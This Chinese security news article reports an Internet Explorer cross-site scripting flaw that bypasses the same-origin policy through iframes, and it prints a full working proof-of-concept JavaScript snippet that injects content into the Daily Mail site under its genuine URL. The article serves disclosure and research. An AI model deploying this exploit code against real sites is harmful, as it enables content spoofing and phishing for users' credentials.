英国安全咨询公司研究员David Leo演示了通过这个漏洞将“Hacked by Deusen”字符插入到一个合法的网站《每日邮报》
在外部域页面加载时,地址栏仍然显示的是http://www.dailymail.co.uk/home/index.html,这个页面让用户误以为网站是合法的。此外,如果这是一个银行网站,那么用户很容易的被钓鱼,泄露登录凭证。
使用iframe标签,这个漏洞可以绕过同源策略。即允许在网页上允许来自用一站点的文件对象模型(DOM),不允许访问其他站点的DOM。该漏洞还可以绕过HTTP-TO-HTTPS限制的标准。来自Tumblr的高级安全工程师Joey Fowler发表评论:
"只要页面不包含X-Frame-Options(有deny或same-origin值),该漏洞都能执行成功。"
微软发言人说:"要利用这个漏洞,攻击者需要吸引用户访问恶意网站,来进行网络钓鱼,我们将继续鼓励用户不要打开不明来源的链接地址,也不要访问不可信的网站,离开网站的时候要及时注销账号。"
绕过同源策略的代码:
function go() { w=window.frames[0]; w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\'Closethis window after 3seconds...\');x.location=\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\';'))",1); } setTimeout("go()",1000);
本文始发于微信公众号(关注安全技术):最新IE XSS漏洞可能导致钓鱼攻击
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论